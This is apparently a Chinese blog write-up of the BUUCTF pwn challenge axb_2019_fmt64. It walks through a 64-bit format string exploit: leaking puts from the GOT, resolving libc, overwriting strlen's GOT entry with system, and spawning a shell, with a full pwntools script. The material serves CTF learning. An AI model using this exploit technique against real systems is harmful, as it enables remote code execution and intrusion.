[BUUCTF-pwn]——axb_2019_fmt64

最新推荐文章于 2022-12-14 01:08:27 发布
最新推荐文章于 2022-12-14 01:08:27 发布
阅读量401 收藏 1
点赞数 1
分类专栏: # BUUCTF # 格式化字符串
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Y_peak/article/details/114578591
版权

[BUUCTF-pwn]——axb_2019_fmt64

  • 题目地址:(https://buuoj.cn/challenges#axb_2019_fmt64)[https://buuoj.cn/challenges#axb_2019_fmt64]

这是一道格式化字符串漏洞利用的题目

checksec 一看,竟然连canary都没开,不过开不开好像都木有什么用。
在这里插入图片描述
在IDA中看看,可以看出明显的字符串漏洞
在这里插入图片描述
首先当然是计算偏移了,发送aaaa%4$x, 比较习惯发送这个hhhh。发现距离栈顶是3,还有五个寄存器的距离,So, 偏移是8。
在这里插入图片描述

思路

  1. 利用格式化字符串漏洞,利用偏移泄露出一个got表地址
  2. 找到libc版本,并计算偏移找到我们需要的函数
  3. 再次利用漏洞,修改我们想要利用的函数的got表,将其修改为我们需要的函数
    strlen这个函数是我们经常利用的,一般将其修改为system。
  4. 最后一次利用时,记得先输入 ’ ; ', 因为linux会按照 ’ ; ’ 挨个执行命令的

exploit

from pwn import * 
from LibcSearcher import LibcSearcher

#p = process('./axb_2019_fmt64')
p = remote("node3.buuoj.cn",25106)
elf = ELF("./axb_2019_fmt64")
#context.log_level = 'debug'
#gdb.attach(p,'b *0x000400957')
puts_got = elf.got["puts"]
strlen_got = elf.got["strlen"]

# 1 
payload = "%9$s" + "aaaa" + p64(puts_got)
p.sendafter("Please tell me:",payload)
print p.recvuntil("Repeater:")
puts_addr = u64(p.recvuntil('\x7f').ljust(8,'\x00'))
log.success("puts_addr ---> " + hex(puts_addr))
# 2
libc = LibcSearcher('puts', puts_addr)
libc_base = puts_addr - libc.dump('puts')
sys = libc_base + libc.dump('system')
binsh = libc_base + libc.dump("str_bin_sh")
log.success("system_addr ---> "+hex(sys))  #打印的目的,就是如果出错,查看是否修改成功。
# 3
#一般修改前三个字节就好。后面的都是一样的,在同一个libc中
sys_high = (sys >> 16) & 0xff
sys_low = sys & 0xffff
log.success('sys---->>'+hex(sys))
log.success('low---->>'+hex(sys_low))
log.success('high---->>'+hex(sys_high))
payload2 = "%" + str(sys_high - 9) + "c%12$hhn" + "%" + str(sys_low - sys_high) + "c%13$hn"
payload2 = payload2.ljust(32,"A") + p64(strlen_got + 2) + p64(strlen_got)

p.sendafter("Please tell me:",payload2)
# 4	
payload3 = ';/bin/sh\x00'
p.sendafter("Please tell me:",payload3)

p.interactive()
Y-peak
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
专栏目录
Pwn2019安洵杯线上赛 fmt32 && fmt64
Nothing
12-01 1021
出题人好像比较喜欢blind pwn,5道pwn题里有3个,由于时间关系来不及看rop64了(我太菜)。 1.fmt32 只给了ip&port,没有附件猜测是blind pwn,根据题目名字,猜想有格式化字符串漏洞,试了一下发现是一个循环(毕竟是复读机),每次都可以利用格式化字符串漏洞,于是首先想法是先将内存dump下来再分析,如果32位程序没开pie保护,程序首地址为0x8048000。...
BUUCTF之“axb_2019_fmt64
Probeginner的博客
12-15 3244
64位下格式化字符串漏洞,内存地址任意写
axb_2019_fmt64
z1r0的博客
01-11 1674
axb_2019_fmt64 查看保护
axb-2019-fmt64
Stella_Leo的博客
08-24 670
格式化字符串,讲点不一样的 64位格式化字符串学习 题目来自2019安洵杯。 这个漏洞原理很简单,就是简单的格式化字符串漏洞,泄露和劫持got表。但是64位呢,和32位有一点点不一样的地方,在这里强调和学习记录一下 直接把我坑傻了顺便学习一下libcsearcher的用法 [*] '/home/l/Desktop/AD/axb_2019_fmt64' Arch: amd64-64-little RELRO: Partial RELRO Stack: No cana
64位格式化字符串漏洞利用——axb_2019_fmt64
weixin_46521144的博客
03-23 2528
题目可在buuoj上找到,不知道为啥现在github怎么也上不去了,传不了题目 学了好多遍fmtstr了,感觉ctf这种学习就是。。。不学就会忘,不能停止做题目。。。 64位fmtstr和32位不同之处在于 1.传入地址可能存在0字符截断(32位由于字符数量少,可能没有这个问题) 2.修改地址可能产生%xc中x过大导致网络异常 就本题而言,会出现这两种情况 首先使用IDA容易看出,这里有格式化字符串漏洞,64位 使用一般方法确定偏移量 容易看出这是第八个参数 之后采用一般的got-hijack方法,泄露pu
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
ciscn-2019-pwn
11-29
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...
CVE-2021-27246_Pwn2Own2020
03-03
Pwn2Own 2020东京版-TPlink漏洞利用 这是在Pwn2Own 2020 Tokyo期间用于开发TPlink Archer路由器的文件。 该漏洞的编号为CVE-2021-27246。 您可以在synacktiv网站上查看博客文章以了解详细信息。
[BUUCTF]PWN——axb_2019_fmt64(64位格式化字符串改got表)
mcmuyanga的博客
01-27 2525
axb_2019_fmt64 附件 步骤: 例行检查,64位程序,只开启了nx保护 本地运行看一下,可以一直输入 64位ida打开 跟axb_2019_fmt32差不多,所以还是再次利用格式化字符串漏洞通过%n来写入数据 利用过程 首先找一下偏移,偏移为8 找到偏移后我们就可以泄露libc,计算system和bin/sh了 一开始打算跟fmt32一样来泄露libcpayload = p64(puts_got)+"%08$s",失败了,动调发现被/x00截断了,64位都有这个情况,关于64位格式
[BUUCTF]PWN——axb_2019_heap(格式化字符串,off-by-one,unlink)
mcmuyanga的博客
01-26 779
axb_2019_heap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,经典的堆题的菜单 64位ida载入 main() banner()
BUUCTF-pwn(11)
njh18790816639的博客
01-09 2730
mrctf2020_easy_equation 简单的栈溢出漏洞,格式化字符串漏洞!此处采用栈溢出漏洞! axb_2019_fmt64 经典循环格式化字符串64位漏洞! 唯一注意的地方pwntools的FmtStr_payload无法成功获取权限!需要手动计算字节进行攻击! from elftools.construct.macros import Padding from pwn import * from LibcSearcher import * context(log_level='debu
buuctf gyctf_2020_borrowstack(栈迁移)和r2t4,axb_2019_fmt32(格式化字符串和fmtstr_payload工具的使用)
carol2358的博客
05-24 1334
头痛,之前栈学的漏洞好多,只学了相关知识没有做题,真正碰到题目就不会了,真的头痛 gyctf_2020_borrowstack 栈迁移 payload设置 此种攻击方法的关键在于如何同时控制ebp和eip,那么如何同时控制ebp和eip的值的? 1、使用ROPgadget查找leave;ret指令所在的地址 2、覆盖完成bufer后,使用可控制的地址覆盖ebp的值,使用上述leave;ret指令所在地址覆盖ret的值。 程序运行(32位,64位同理): 1、当函数正常返回时,执行leave;re
BUUCTF-PWN刷题记录-8
weixin_44145820的博客
04-16 891
目录roarctf_2019_realloc_magic roarctf_2019_realloc_magic
BUUCTF axb_2019_fmt32
BengDouLove的博客
04-16 1539
主程序就是这样的,能看到有一个printf的格式化字符串漏洞 sprintf 相当于把参数替换了之后的格式化字符串送入了第一个参数,也就是format 首先,没有后门也没有系统函数,要用格式化字符串泄露出牟哥libc函数,来获得libc基址 然后,仔细算一下 s 和 format 两个参数,都没有溢出,,也没有函数能写进got表,,所以还是再次利用格式化字符串漏洞通过%n来写入数据 先看...
持续更新 BUUCTF——PWN(二)
weixin_41748164的博客
12-14 390
buuctf pwn 第三页
BUUCTFpwn】解题记录(1-3页已完结)
Assassin
05-05 1904
文章目录ripwarmup_csaw_2016ciscn_2019_n_1pwn1_sctf_2016jarvisoj_level0ciscn_2019_c_1(栈溢出+ret2libc+plt调用)[第五空间2019 决赛]PWN5ciscn_2019_n_8jarvisoj_level2[OGeek2019]babyropbjdctf_2020_babystackget_started_3dsctf_2016(mprotect+read+shellcode)cn_2019_en_2jarvisoj_le
BUUOJ PWN 81-100
2h4ox1n9
12-17 346
81、pwnable_hacknote 82、jarvisoj_level5 83、hitcon2014_stkof 84、cmcc_pwnme2 85、actf_2019_babystack 86、npuctf_2020_easyheap 87、picoctf_2018_can_you_gets_me 88、picoctf_2018_got_shell 89、[BJDCTF 2nd]snake_dyn 90、axb_...
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取...
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值